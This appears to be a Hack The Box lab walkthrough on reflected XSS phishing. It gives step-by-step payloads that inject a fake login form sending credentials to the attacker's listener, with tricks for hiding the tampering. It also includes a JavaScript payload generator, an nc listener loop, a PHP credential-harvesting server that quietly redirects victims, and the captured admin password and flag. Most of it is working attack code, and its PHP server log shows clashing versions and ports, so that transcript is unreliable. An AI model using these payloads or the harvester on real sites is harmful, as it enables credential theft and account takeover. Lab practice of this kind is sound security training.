XSS PHISHING
Phishing attacks usually rely on legitimate-looking content to trick victims into handing their sensitive information to the attacker. A common form of XSS phishing is injecting a fake login form that sends the entered credentials to the attacker's server; the attacker can then log in on the victim's behalf and take over their account and data.
IDENTIFY XSS VULNERABILITY
#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
* review the HTML source and identify parameters
* also review the .js file
#perform a test to see where the input is being stored
root@oco:~$ BROWSER > {targetSite:port}
input field: test
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
* <img src='test'>
#perform xss vulnerability test
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>alert(window.origin)</script>
#create the correct payload
root@oco:~$ '><script>alert(window.origin)</script>
* the input is reflected into <img src='INPUT'>, so the leading '> closes the
src attribute and the <img> tag; our <script> then sits as its own element
and the template's original trailing '> ends up as harmless text after the
closing </script> tag
- <img src=''><script>alert(window.origin)</script>'>
root@oco:~$ ip address show
* 10.10.15.203
#prepare HTML code locally to see how it'll look
root@oco:~$ nano xssPhishing
<h3>Please login to continue</h3>
<form action=http://10.10.15.203:8080>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
#minify
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
input: ...HTML code...
output: ...minified HTML code...
#inject
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>
* the injected HTML must display a login form on the targeted page
* the form must submit the login details to a server we are listening on, so
that once a user attempts to log in we receive their credentials
* the form posts to port 8080 rather than 80 because 80 may already be in use
(and needs root to bind); any free port works as long as the listener uses
the same one
#cleanup - remove unnecessary items on the page to make it look legitimate
root@oco:~$ BROWSER > CTRL + SHIFT + C
* this opens the inspector's element picker
- click the element that must be removed: in this example the original
image URL field, whose enclosing form has id="urlform"
- the extra statement is document.getElementById('urlform').remove();
- it is appended right after the document.write() call, inside the same
<script> block
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script>
#clean up the page to remove any signs of tampering
#the trailing <!-- opens an HTML comment that is never closed, so the browser
#discards everything after our </script> (the stray '> remnant and whatever
#original markup followed the injection point) instead of rendering leftovers
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
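The payload above is assembled by hand in three steps (break out of the <img> tag, write the form, remove the leftover element, comment out the rest). The following is an added example, not part of the original notes, that builds the same payload programmatically so the escaping rules are explicit: the form HTML is minified, turned into a single-quoted JS string literal (with quotes, backslashes and "</" escaped so a "</script>" inside the markup can never end the injected script early), and then wrapped in the '><script>...</script><!-- breakout. It assumes the template is <img src='INPUT'>, the listener is 10.10.15.203:8080 and the leftover element is id="urlform", as found on this page; the function and constant names are hypothetical. The reflection at the end is simulated with a string replace, not a real server.

```javascript
// Added example (not from the original notes): build the reflected-XSS
// phishing payload from its parts. Assumptions: the vulnerable template is
// <img src='INPUT'>, the listener is 10.10.15.203:8080 and the element to
// remove has id="urlform" (all taken from the notes); function names are mine.

const LISTENER = "http://10.10.15.203:8080"; // our listener, as in the notes

// The login form as drafted in nano, before minifying. A browser renders an
// unknown input type as text, so type="text" is used here explicitly.
const FORM_HTML = `
<h3>Please login to continue</h3>
<form action=${LISTENER}>
  <input type="text" name="username" placeholder="Username">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" name="submit" value="Login">
</form>
`;

// Collapse the whitespace between tags (what the online minifier did).
function minifyHtml(html) {
  return html.replace(/>\s+</g, "><").trim();
}

// Turn arbitrary HTML into a single-quoted JS string literal that is safe
// inside an inline <script>: escape backslashes, quotes and newlines, and
// break "</" so a "</script>" in the markup cannot terminate our script.
function jsStringLiteral(s) {
  const body = s
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/\r?\n/g, "\\n")
    .replace(/<\//g, "<\\/");
  return `'${body}'`;
}

// Assemble the full injection string.
function buildPayload({ html, removeId, commentOutRest }) {
  let js = `document.write(${jsStringLiteral(minifyHtml(html))});`;
  if (removeId) js += `document.getElementById('${removeId}').remove();`;
  // '> closes the src attribute and the <img> tag we are reflected into.
  let payload = `'><script>${js}</script>`;
  // An unterminated <!-- swallows whatever original markup follows us.
  if (commentOutRest) payload += "<!--";
  return payload;
}

// What the vulnerable page emits once our input is reflected into the template.
// (Function replacement avoids "$" patterns in the input being interpreted.)
function simulateReflection(template, input) {
  return template.replace("{{INPUT}}", () => input);
}

const payload = buildPayload({ html: FORM_HTML, removeId: "urlform", commentOutRest: true });
const page = simulateReflection("<img src='{{INPUT}}'>", payload);
console.log(payload);
console.log(page);
```

Run it with node and paste the first printed line into the vulnerable field; the second line shows that the template's trailing '> now sits after the <!-- and is never rendered.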
root@oco:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.15.203] from (UNKNOWN) [10.10.15.203] 41330
GET /?username=username&password=password&submit=Login HTTP/1.1
Host: 10.10.15.203:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.129.141.202/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
* the nc command above exits after handling a single connection; to accept
several, wrap it in a Bash while loop
- see the code below for the multi-connection version
root@oco:~$ while true; do
echo "Listener (re)started at $(date)" >> connections.log
sudo nc -nlvp 8080 2>&1 | tee -a connections.log
done
* this restarts nc each time a connection closes, giving a simple persistent
listener that accepts connections one at a time
* nc -v prints the peer address on stderr, so the 2>&1 redirect and tee are
what actually put the connection details (and the captured request) into the
log; the echo alone only records when the listener was (re)started
* netcat never sends an HTTP response, so the victim's browser just hangs on
our listener and the attempt is obvious; the above only shows what arrives
- use a PHP listening server instead: it records the credentials and then
redirects the victim to the real login page, so it looks like an ordinary
(failed) login attempt
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file
<?php
// only react to requests that carry both form fields
if (isset($_GET['username']) && isset($_GET['password'])) {
    // append the captured pair to creds.txt next to this script
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    fclose($file);
    // send the victim back to the target's real login page, not to our own
    // listener (which has no /phishing/index.php and would just 404)
    header("Location: http://{targetSite:port}/phishing/index.php");
    exit();
}
?>
root@oco:~$ sudo php -S 0.0.0.0:8080
PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
[Mon Nov 4 20:11:33 2024] PHP 8.2.24 Development Server (http://0.0.0.0:8081) started
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 Accepted
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 [302]: GET /?username=admin&password=p1zd0nt57341myp455&submit=Login
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 Closing
#
root@oco:~$ BROWSER > {targetSite:port}/phishing/index.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/send.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/login.php
* admin:p1zd0nt57341myp455
* HTB{r3f13c73d_cr3d5_84ck_2_m3}